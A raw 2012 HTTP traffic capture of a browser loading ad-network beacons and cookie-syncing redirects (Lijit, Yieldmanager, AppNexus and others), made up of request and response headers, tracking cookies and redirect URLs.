Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: testbounce=testing; BX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322; uid=uid=92eeb846-311f-11e2-9d59-57072c508a64&amp;_hmacv=1&amp;_salt=2599266553&amp;_keyid=k1&amp;_hmac=0787c7ef74949d47565796432b69ddf9ee7dc8a9; RMBX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:49 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0967.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sun, 18 Nov 2012 01:30:49 GMT
Expires: Sun, 18 Nov 2012 01:30:49 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /beacon?viewId=13532022484877bb0b8a1c13f&rand=1353202248487&uri=http://www.lijit.com/users/bloguin/1&informer=6280786&type=fpads&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&ifr=1&v=1.0&rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: gslbeacon.lijit.com
GET /beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJwVjMENwzAMxHbROwLik2Sdu40jJ0sU3T3uhx8S%2FEqTj1iSDicyAesnR8ghtk2ckzbtUcJLfWzMXk250OhR7Gk7bf%2FL40HamjrjgjowdOAOrbqicXkyIb8XsC0aVw%3D%3D
HTTP/1.0 200 OK

Content-Type: text/html
Server: Lijit Blackbird 0.0.2
Connection: close
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Length: 713
Set-Cookie: tpro=eJxNkEGOwyAMRe%2FiNapICG2aa3R2oxFCxEmQAkSQjjSqcvcxrlp192z%2B%2FzZ%2BQPE7Fhi%2BH0wwwG1LeS8gwO4wNEqrVrZtdz1%2BBKR9wQzDA0IajUv3WBUCwu4DfmoF%2FGIuPkWKg0NAxglz9nG%2Boc1u%2BcIc6khK3HKa%2FIo100eXAlMjpdnWO0nkqb0IOEtDLa56AUqas3w9SaOYm57G2JntSpvuWptKgP5I0uQ1TVtZEjdUXNhL3BvVsYViXFpXfEbN2Y6muIVl%2BuNJnjoBMcUn6upa%2FDpmjNX2hzyxa6umkq7rzRjH5%2FkmDHZlK2W%2BsR7KOp7r7N3VXv%2B%2BOe1Mey6%2BbMxn%2Bm3xNr4%2BY6dsbOCqP47jH9NAhR0%3D%00%00;Expires=Mon, 18-Nov-13 01:30:49 GMT;Domain=localhost tpro_inst=83af0a087498e783aeb500f7c666b86b;Expires=Mon, 18-Nov-13 01:30:49 GMT;Domain=localhost
GET /www/delivery/lg.php?bannerid=1548&campaignid=232&cids=232&bids=1548&zoneid=95028&tid=95028_1353202247953a384128fa26e&channel_ids=,&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&cb=62daa3d1b0 HTTP/1.1

Host: vap4iad3.lijit.com
GET /www/delivery/lg.php?bannerid=1548&amp;campaignid=232&amp;cids=232&amp;bids=1548&amp;zoneid=95028&amp;tid=95028_1353202247953a384128fa26e&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=62daa3d1b0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJwVjMENwzAMxHbROwLik2Sdu40jJ0sU3T3uhx8S%2FEqTj1iSDicyAesnR8ghtk2ckzbtUcJLfWzMXk250OhR7Gk7bf%2FL40HamjrjgjowdOAOrbqicXkyIb8XsC0aVw%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:49 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; expires=Mon, 18-Nov-2013 01:30:49 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
GET /cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&nwid=10000602235&sigv=1 HTTP/1.1

Host: ad.yieldmanager.com
GET /cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&amp;nwid=10000602235&amp;sigv=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: testbounce=testing; BX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322; uid=uid=92eeb846-311f-11e2-9d59-57072c508a64&amp;_hmacv=1&amp;_salt=2599266553&amp;_keyid=k1&amp;_hmac=0787c7ef74949d47565796432b69ddf9ee7dc8a9; RMBX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322
HTTP/1.1 302 Found

Content-Type: text/plain; charset=utf-8
Date: Sun, 18 Nov 2012 01:30:49 GMT
P3P: policyref=&quot;http://p3p.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV&quot;
Location: http://ib.adnxs.com/ymapuid?xid=uQEhnqh75rRNwbM0SsM5ls5c
Cache-Control: private
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
GET /cm?in=1&pub=1827 HTTP/1.1

Host: p.rfihub.com
GET /cm?in=1&amp;pub=1827 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: s6=1353202246666; u=&quot;aABvdhPXw==AI3oyfww==AAABOxEjpAo=&quot;; e=cr; a=c637540824086897895; j=c637540824086897895; r=1353202246666; o=1-NJVLzSACSlLX; p=1-NJVLzSACSlLX
HTTP/1.1 302 Found

HTTP/1.1 302 Found
P3P: CP=&quot;NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT&quot;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: v=1353202249846;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:49 GMT s6=1353202249846;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:49 GMT u=&quot;aABvdnEGQ==AI3oyfww==AAABOxEjsHY=&quot;;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:49 GMT e=cr;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:49 GMT a=c637540824086897895;Path=/;Domain=.rfihub.com;Expires=Thu, 07-May-15 01:30:49 GMT j=c637540824086897895;Path=/;Domain=.rfihub.com
Location: http://ce.lijit.com/merge?pid=10&amp;3pid=637540824086897895&amp;forward=
Content-Length: 0
GET /lj_match?r=1353202249734 HTTP/1.1

Host: um.simpli.fi

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uid=arsYzhphb2F9Y9jhvoZanh%3D%3D
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: nginx
Date: Sun, 18 Nov 2012 01:30:49 GMT
Transfer-Encoding: chunked
Connection: close
Location: http://ce.lijit.com/merge?pid=2&amp;3pid=CE18BB6A616F611AE1D8637D9E5A86BE
P3P: policyref=&quot;http://www.simplifi.com/w3c/Policies.xml&quot;, CP=&quot;ADMa DEVa PSAa PSDa OUR IND DSP NON COR&quot;
GET /site=782469/size=728090/u=2/bnum=11199087/wkhr=2/hr=2/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html HTTP/1.1

Host: r1.ace.advertising.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?bV5bEg73CQA77oEAAAAAAPX-IAAAAAAAAgAAAAYAAAAAAP8AAAABA3hSEwAAAAAAm2QrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqhT3OyR7xDJK195hRdfly8dHG-p899Mi2NOC2AAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F15c83429-2270-477c-9adf-69374f516793lijit_leader..html,Z%3D728x90%26_salt%3D1015090667%26anmember%3D514%26anprice%3D140%26r%3D0%26s%3D653070,95510210-311f-11e2-ab35-13ecb67a31a5,1353202249339
Cookie: ACID=NL630013532022460065; ASCID=NL630013532022460065; F1=BckOoClAAAAAHC/CAEAAgEABAAAABAAAAEAAgEA
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Sun, 18 Nov 2012 01:30:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP=&quot;NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV&quot;, an.n=&quot;Advertising.com&quot;, an.pp=&quot;http://advertising.aol.com/privacy/advertisingcom&quot;, an.oo=&quot;http://advertising.aol.com/privacy/advertisingcom/opt-out&quot;, an.by=&quot;Y&quot;
Comscore: CMXID=2115.1008817.782469.0XMC
Set-Cookie: F1=BkkOoClAAAAAFC/CAEAAgEgAAAAAHC/CAEAAgEABAAAABAAAAIAAgEA; domain=advertising.com; expires=Tue, 18-Nov-2014 01:30:49 GMT; path=/ 11199087=_50a83a49,5784873452,782469^1008817^-20^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 18 Nov 2012 01:30:49 GMT
ntCoent-Length: 483
Content-Encoding: gzip
Content-Length: 321
GET /getuid?http://ce.lijit.com/merge?pid=12&3pid=$UID HTTP/1.1

Host: ib.adnxs.com
GET /getuid?http://ce.lijit.com/merge?pid=12&amp;3pid=$UID HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FSmKI[iYaGkPx%UzCSL(do&lt;3%OgI&lt;955fX]&gt;5y9nKjMD7(K$B#at`&lt;; sess=1; icu=ChII64YEEAoYAyADKAMwyfSghQUKEgjTzAgQChgBIAEoATDG9KCFBRDJ9KCFBRgD; acb101605=![nC'XI()vE0+e54(v&gt;WMqfR+?enc=09LS0tLS4j8AAAAAAADgPwAAAAAAAOA_oehwY2kW4z-uEcE4uHTmP9RPlHBhqX1RoArzhH1cTlFDOqhQAAAAAKyWCAACAgAANQEAAAIAAABb7zEA51gBAAAAAQBVU0QAVVNEAKAAWAIvmQAADEoBAgUCAQUAAIIAJCI4EgAAAAA.&amp;tt_code=653070&amp;cnd=%21FCe48wiKeRDb3scBGAAg57EFMAA4r7IGQABItQJQrK0iWABg2AZoAHACeKIQgAG-CogB6AKQAQGYAQGgAQGoAQOwAQC5Aa8j6pa3dOY_wQGvI-qWt3TmP8kBlC84yfTw7T_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+3338%2C+1353202243%29%3Buf%28%27r%27%2C+3272539%2C+1353202243%29%3Bppv%282932%2C+%275872035725126684628%27%2C+1353202243%2C+1354411843%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21cgWdLAiKeRDb3scBGOexBSAA&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb508244=![nC'208WMELHn6E/qX3N6)[-?enc=09LS0tLS8j8AAAAAAADwPwAAAAAAAPA_Hxj2ajYF8z9D_plBfGD2P90kqW0UMh5UoArzhH1cTlFEOqhQAAAAAK-WCAACAgAANQEAAAIAAACdkRIA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAArkwBAgUCAQUAAAAAASAjZgAAAAA.&amp;tt_code=1651067&amp;cnd=%21_CJ5AAiKeRCdo0oYACDnsQUwADiHuAFAAEi1AlCvrSJYAGDYBmgAcAB4AIABvgqIAegCkAEBmAEBoAEBqAEDsAEAuQFRTJOAfGD2P8EBUUyTgHxg9j_JARe7GVb71f0_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+3338%2C+1353202244%29%3Buf%28%27r%27%2C+1216925%2C+1353202244%29%3Bppv%282932%2C+%276061337211807802589%27%2C+1353202244%2C+1354411844%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21ewSJIQiKeRCdo0oY57EFIAA.&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb376282=![nC'kI/7Z_RG40Qz[m]Ok_22?enc=AQAAAAAA_D_NzMzMzMz3PwAAAMDMzABAzczMzMzM9z8AAAAAAAD8Pxdw-m4mBc0coArzhH1cTlFJOqhQAAAAAKyWCAACAgAA1gEAAAIAAADkJTwA51gBAAAAAQBVU0QAVVNEANgCWgAvmQAAGjsBAgUCAQUAAIIAjSImIwAAAAA.&amp;tt_code=653070&amp;cnd=%21NB4FtwiTsCcQ5MvwARgAIOexBTAAOK-yBkAASNYDUKytIlgBYNgGaABwGngAgAGGAYgBAJABAZgBAaABAagBArABALkBAAAAAAAA_D_BAQAAAAAAAPw_yQF97iwa0GS7P9kBAAAAAAAA8D_gAQA.&amp;udj=uf%28%27a%27%2C+1317%2C+1353202249%29%3Buf%28%27c%27%2C+645139%2C+1353202249%29%3Buf%28%27r%27%2C+3941860%2C+1353202249%29%3Bppv%281339%2C+%272075320665916469271%27%2C+1353202249%2C+1353807049%2C+645139%2C+88295%2C+0%2C+0%2C+1209600%29%3Bppv%2848189%2C+%272075320665916469271%27%2C+1353202249%2C+1353807049%2C+645139%2C+88295%2C+0%2C+0%2C+10368000%29%3B&amp;ccd=%21-AW9MwiTsCcQ5MvwARjnsQUgAA..&amp;vpid=124&amp;creative_click=http%3A%2F%2Fwww.dnafootwear.com%2Fseychelles%3Fsec%3Dwomen%3Futm_source%3DVISISEEK%26utm_medium%3DVISISEEK-RTB-Display%26utm_campaign%3DVISISEEK-Remarketing&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:49 GMT; domain=.adnxs.com; HttpOnly
Location: http://ce.lijit.com/merge?pid=12&amp;3pid=5858721859426781856
Date: Sun, 18 Nov 2012 01:30:49 GMT
Content-Length: 0
GET /00/72/26/uat_2672.js?ad_size=728x90 HTTP/1.1

Host: ad-cdn.technoratimedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://r1.ace.advertising.com/site=782469/size=728090/u=2/bnum=11199087/wkhr=2/hr=2/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: tads_uid=EAA39E271E934570A4875DED1767D57F; tads_uid_cd=20121117173048-0800; tads_zora=1|15662|1; tads_au=&quot;1|CAE=&quot;
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Encoding: gzip
_ontent-Length: 9706
Accept-Ranges: bytes
Date: Sun, 18 Nov 2012 01:30:49 GMT
Etag: &quot;142a1d-25ea-4cbe3a3f0e932&quot;
Last-Modified: Fri, 12 Oct 2012 21:47:55 GMT
Server: ECS (arn/46E5)
Vary: Accept-Encoding
X-Cache: HIT
X-Via: CN-5000
Content-Length: 3727
GET /match?p=31&ord=20120711T025630 HTTP/1.1

Host: match.rtbidder.net
GET /match?p=31&amp;ord=20120711T025630 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: bsuid=%3EtLIHZe%21%3A%28BRn%23%28
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: rtbidder
Date: Sun, 18 Nov 2012 01:30:48 GMT
Content-Length: 233
P3P: policyref=&quot;http://match.rtbidder.net/p3p.xml&quot;, CP=&quot;NOI DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo HISa TELo OUR STP&quot;
Pragma: no-cache
Set-Cookie: bsuid=%3EtLIHZe%21%3A%28BRn%23%28; path=/; domain=.rtbidder.net; expires=Sat, 16-Feb-2013 01:30:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-store, no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://ce.lijit.com/merge?pid=13&amp;3pid=50a83a45a735dc4b5be8a818
GET /ymapuid?xid=uQEhnqh75rRNwbM0SsM5ls5c HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FSmKI[iYaGkPx%UzCSL(do&lt;3%OgI&lt;955fX]&gt;5y9nKjMD7(K$B#at`&lt;; sess=1; icu=ChII64YEEAoYAyADKAMwyfSghQUKEgjTzAgQChgBIAEoATDG9KCFBRDJ9KCFBRgD; acb101605=![nC'XI()vE0+e54(v&gt;WMqfR+?enc=09LS0tLS4j8AAAAAAADgPwAAAAAAAOA_oehwY2kW4z-uEcE4uHTmP9RPlHBhqX1RoArzhH1cTlFDOqhQAAAAAKyWCAACAgAANQEAAAIAAABb7zEA51gBAAAAAQBVU0QAVVNEAKAAWAIvmQAADEoBAgUCAQUAAIIAJCI4EgAAAAA.&amp;tt_code=653070&amp;cnd=%21FCe48wiKeRDb3scBGAAg57EFMAA4r7IGQABItQJQrK0iWABg2AZoAHACeKIQgAG-CogB6AKQAQGYAQGgAQGoAQOwAQC5Aa8j6pa3dOY_wQGvI-qWt3TmP8kBlC84yfTw7T_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+3338%2C+1353202243%29%3Buf%28%27r%27%2C+3272539%2C+1353202243%29%3Bppv%282932%2C+%275872035725126684628%27%2C+1353202243%2C+1354411843%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21cgWdLAiKeRDb3scBGOexBSAA&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb508244=![nC'208WMELHn6E/qX3N6)[-?enc=09LS0tLS8j8AAAAAAADwPwAAAAAAAPA_Hxj2ajYF8z9D_plBfGD2P90kqW0UMh5UoArzhH1cTlFEOqhQAAAAAK-WCAACAgAANQEAAAIAAACdkRIA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAArkwBAgUCAQUAAAAAASAjZgAAAAA.&amp;tt_code=1651067&amp;cnd=%21_CJ5AAiKeRCdo0oYACDnsQUwADiHuAFAAEi1AlCvrSJYAGDYBmgAcAB4AIABvgqIAegCkAEBmAEBoAEBqAEDsAEAuQFRTJOAfGD2P8EBUUyTgHxg9j_JARe7GVb71f0_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+3338%2C+1353202244%29%3Buf%28%27r%27%2C+1216925%2C+1353202244%29%3Bppv%282932%2C+%276061337211807802589%27%2C+1353202244%2C+1354411844%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21ewSJIQiKeRCdo0oY57EFIAA.&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb376282=![nC'kI/7Z_RG40Qz[m]Ok_22?enc=AQAAAAAA_D_NzMzMzMz3PwAAAMDMzABAzczMzMzM9z8AAAAAAAD8Pxdw-m4mBc0coArzhH1cTlFJOqhQAAAAAKyWCAACAgAA1gEAAAIAAADkJTwA51gBAAAAAQBVU0QAVVNEANgCWgAvmQAAGjsBAgUCAQUAAIIAjSImIwAAAAA.&amp;tt_code=653070&amp;cnd=%21NB4FtwiTsCcQ5MvwARgAIOexBTAAOK-yBkAASNYDUKytIlgBYNgGaABwGngAgAGGAYgBAJABAZgBAaABAagBArABALkBAAAAAAAA_D_BAQAAAAAAAPw_yQF97iwa0GS7P9kBAAAAAAAA8D_gAQA.&amp;udj=uf%28%27a%27%2C+1317%2C+1353202249%29%3Buf%28%27c%27%2C+645139%2C+1353202249%29%3Buf%28%27r%27%2C+3941860%2C+1353202249%29%3Bppv%281339%2C+%272075320665916469271%27%2C+1353202249%2C+1353807049%2C+645139%2C+88295%2C+0%2C+0%2C+1209600%29%3Bppv%2848189%2C+%272075320665916469271%27%2C+1353202249%2C+1353807049%2C+645139%2C+88295%2C+0%2C+0%2C+10368000%29%3B&amp;ccd=%21-AW9MwiTsCcQ5MvwARjnsQUgAA..&amp;vpid=124&amp;creative_click=http%3A%2F%2Fwww.dnafootwear.com%2Fseychelles%3Fsec%3Dwomen%3Futm_source%3DVISISEEK%26utm_medium%3DVISISEEK-RTB-Display%26utm_campaign%3DVISISEEK-Remarketing&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:49 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:49 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:49 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 18 Nov 2012 01:30:49 GMT
Content-Length: 0
GET /m/lj?r=1353202249734 HTTP/1.1

Host: lj.d.chango.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
